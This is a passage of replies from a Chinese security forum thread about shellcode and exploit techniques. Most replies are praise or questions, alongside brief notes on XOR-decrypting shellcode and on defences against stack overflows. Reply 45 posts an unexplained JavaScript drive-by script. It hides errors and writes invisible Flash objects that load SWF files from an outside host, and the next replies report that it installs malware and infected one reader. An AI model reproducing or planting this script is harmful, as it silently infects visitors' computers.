能力值:
( LV2,RANK:10 )
|
-
-
26 楼
占楼向晓聪学习
|
能力值:
( LV13,RANK:970 )
|
-
-
27 楼
o,酱紫r,学习了。
|
能力值:
( LV2,RANK:10 )
|
-
-
28 楼
楼主太厉害了,膜拜。。。
|
能力值:
( LV2,RANK:85 )
|
-
-
29 楼
恐怖
|
能力值:
( LV2,RANK:10 )
|
-
-
30 楼
|
能力值:
( LV2,RANK:10 )
|
-
-
31 楼
顶,果然都是漏洞利用专家
|
能力值:
( LV2,RANK:10 )
|
-
-
32 楼
能绕过comodo的内存防火墙吗?
这东西那天看到的时候吓我一跳,啥时候这东西竟然做成了防火墙了
|
能力值:
( LV13,RANK:330 )
|
-
-
33 楼
学习,还久没玩shellcode了,感觉有些陌生了
|
能力值:
( LV2,RANK:10 )
|
-
-
34 楼
防止堆栈溢出攻击这种技术应该不可能是VM技术
有几种比较不错的技术
1. 使用内存页边界检测和访问权限技术(这种技术比较容易实现,且操作系统的通用性好)
2. 使用Ldr堆地址重定位技术,这种技术实现起来和操作系统密切相关,哪怕一个补丁也可能引发BOSD危险,这种技术在网上能找到文档
3. esp,eip执行断点检测技术,这种技术我不是很清楚
|
能力值:
( LV2,RANK:10 )
|
-
-
35 楼
当有人在研究如何利用漏洞执行shellcode散播病毒的时候,大部分人都爱上了shellcode的研究
而在这个时候有人却在研究如何能防止shellcode的漏洞利用
我试问各位安全界的高手,你们属于哪一种人?
是沉迷于shellcode的人呢,还是真正做安全的人
看到一个这样的签名
网络本来很安全,但当有了安全人员出现以后网络就变得很不安全了
|
能力值:
( LV2,RANK:10 )
|
-
-
36 楼
你用什么样的exe进行OD调试阿?将开头粘贴后,到xor 那一步,则无法进行下去,f4也不行?
|
能力值:
( LV2,RANK:10 )
|
-
-
37 楼
希望大虾们进行回答
|
能力值:
( LV12,RANK:300 )
|
-
-
38 楼
植入的exe那个区段属性必须是RWE,即可读可写可执行(shellcode用xor解密自身的代码,所以区段必须可写,否则会发生0xC0000005内存访问错误),可直接用LordPE修改该区段属性达到目的。
|
能力值:
( LV2,RANK:10 )
|
-
-
39 楼
好强悍。。。收下。。研究之
|
能力值:
( LV8,RANK:120 )
|
-
-
40 楼
写的这么多字,很详细嘛。
居然还加高亮显示?你很强啊(时间真多),呵呵!
过来帮你顶下!
|
能力值:
( LV6,RANK:90 )
|
-
-
41 楼
看起来不错,现在忙啊,等有时间学习学习。。。
|
能力值:
( LV2,RANK:10 )
|
-
-
42 楼
很好的文章
收藏了慢慢看
|
能力值:
( LV2,RANK:10 )
|
-
-
43 楼
你很强大,我很佩服
|
能力值:
( LV9,RANK:2130 )
|
-
-
44 楼
怎么这么多病毒抄那个模块呀.......
|
能力值:
( LV2,RANK:10 )
|
-
-
45 楼
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://mmlan.com.cn/4561.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://mmlan.com.cn/ie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://mmlan.com.cn/4562.swf width=0 height=0>");}}
|
能力值:
( LV2,RANK:10 )
|
-
-
46 楼
楼上当中的一些代码会下载“机器狗”!!!请大家小心。
http://mmlan.com.cn/4561.swf
http://mmlan.com.cn/ie.swf
我下载后打开,就中了……
目前只找到感染explorer.exe及时关了很多下载。(会自动下载很多……,抓到有好多,当中的11111.exe壳搞不定……)
|
能力值:
( LV2,RANK:10 )
|
-
-
47 楼
晕,你用ie打开干啥啊
用wget
这个是cnBeta.com上面挂的马
里边的驱动,挺有意思,还骂了金山,呵呵
|
能力值:
( LV2,RANK:10 )
|
-
-
48 楼
又系漏洞,怕怕,学习学习
|
能力值:
( LV2,RANK:10 )
|
-
-
49 楼
学习....很强悍
|
能力值:
( LV2,RANK:10 )
|
-
-
50 楼
学习。谢谢分享
|
|
|